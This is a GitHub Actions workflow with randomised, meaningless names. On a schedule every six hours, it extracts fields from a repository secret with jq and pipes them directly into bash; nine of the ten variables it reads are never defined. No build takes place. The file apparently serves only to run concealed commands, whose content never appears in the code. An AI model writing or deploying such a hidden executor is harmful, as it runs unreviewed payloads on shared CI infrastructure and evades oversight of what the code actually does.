name: zhengzadak
on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'

jobs:  # 6758
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhengzadak
        env:
          er070: ${{ secrets.er070 }}
        run: |
          echo $er070 | jq -r .i4 | /bin/bash
          echo $cva2 | jq -r .r162 | /bin/bash
          echo $jujv9890 | jq -r .wl63 | /bin/bash
          echo $qyk45670 | jq -r .k735 | /bin/bash
          echo $izvqi637 | jq -r .rtec5 | /bin/bash
          echo $ekuz872 | jq -r .qf8 | /bin/bash
          echo $riin821 | jq -r .dhorw328 | /bin/bash
          echo $jh284 | jq -r .vab53493 | /bin/bash
          echo $iy7 | jq -r .jysav59326 | /bin/bash
          echo $xbuwu9 | jq -r .lq78 | /bin/bash

